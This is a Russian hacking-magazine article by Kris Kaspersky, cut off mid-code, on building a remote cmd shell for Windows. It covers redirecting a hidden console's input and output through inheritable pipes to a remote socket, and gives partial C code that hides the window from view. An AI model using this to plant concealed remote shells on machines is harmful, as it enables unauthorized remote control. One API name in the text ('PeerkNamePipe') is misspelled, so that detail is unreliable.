CMD-shell на службе у хакера

Крис Касперски aka мыщъх

Спецвыпуск: Хакер, номер #048, стр. 048-016-3

Корректно написанный shell требует создания как минимум двух пайпов - один будет обслуживать стандартный ввод, соответствующий дескриптору hStdInput, другой - стандартный вывод, соответствующий дескрипторам hStdOutput и hStdError. Дескрипторы самих пайпов обязательно должны быть наследуемыми, в противном случае порожденный процесс просто не сможет до них "дотянуться". А как сделать их наследуемыми? Да очень просто - всего лишь взвести флаг bInheritHandle в состояние TRUE, передавая его функции CreatePipe вместе со структурой LPSECURITY_ATTRIBUTES, инициализированной вполне естественным образом.

Остается подготовить структуру STARTUPINFO, сопоставив дескрипторы стандартного ввода/вывода наследуемым каналам, и ни в коем случае не забыть взвести флаг STARTF_USESTDHANDLES, иначе факт переназначения стандартных дескрипторов будет наглым образом проигнорирован.

Однако это еще не все, и самое интересное нас ждет впереди! Для связывания каналов с сокетом удаленного терминала нам потребуется реализовать специальный резидентный диспетчер, считывающий поступающие данные и перенаправляющий их в сокет или канал. Вся сложность в том, что проверка наличия данных в сокете (канале) должна быть неблокируемой, в противном случае нам потребуются два диспетчера, каждый из которых будет выполняться в "своем" потоке, что, согласись, громоздко и неэлегантно.

Обратившись к Platform SDK, мы найдем две полезных функции: PeerkNamePipe и ioctlsocket. Первая отвечает за неблокируемое измерение "глубины" канала, а вторая обслуживает сокеты. Теперь диспетчеризация ввода/вывода становится тривиальной.

// Заполняем поля структуры SECURITY_ATTRIBUTES

// (позже она будет передана функции CreateProcess)

// секретность не требуется

sa.lpSecurityDescriptor = NULL;

// длина структуры SECURITY_ATTRIBUTES

sa.nLength = sizeof(SECURITY_ATTRIBUTES);

// дочерний процесс наследует материнские обработчики

sa.bInheritHandle = TRUE;

// создаем пайпы, через которые впоследствии будет течь весь ввод/вывод

if (!CreatePipe(&cstdin, &wstdin, &sa, 0)) return -1;

if (!CreatePipe(&rstdout, &cstdout, &sa, 0)) return -1;

// считываем состояние текущей консоли

GetStartupInfo(&si);

// говорим, какие именно атрибуты мы будет изменять

si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;

si.wShowWindow = SW_HIDE;// прячем окно от постороннего взгляда

si.hStdOutput = cstdout;// направляем стандартный вывод в пайп

si.hStdError = cstdout;// направляем стандартный вывод об ошибках в пайп

si.hStdInput = cstdin; // направляем стандартный ввод в пайп

// создаем новую консоль со скрытым окном, ввод/вывод которой связан с пайпами

if (!CreateProcess(0, SHELL, 0, 0, TRUE, CREATE_NEW_CONSOLE, 0,0,&si,&pi)) return -1;

// мотаем цикл, пока окно не будет закрыто

while(GetExitCodeProcess(pi.hProcess,&fexit) && (fexit == STILL_ACTIVE))

{

// проверяем наличие данных в пайпе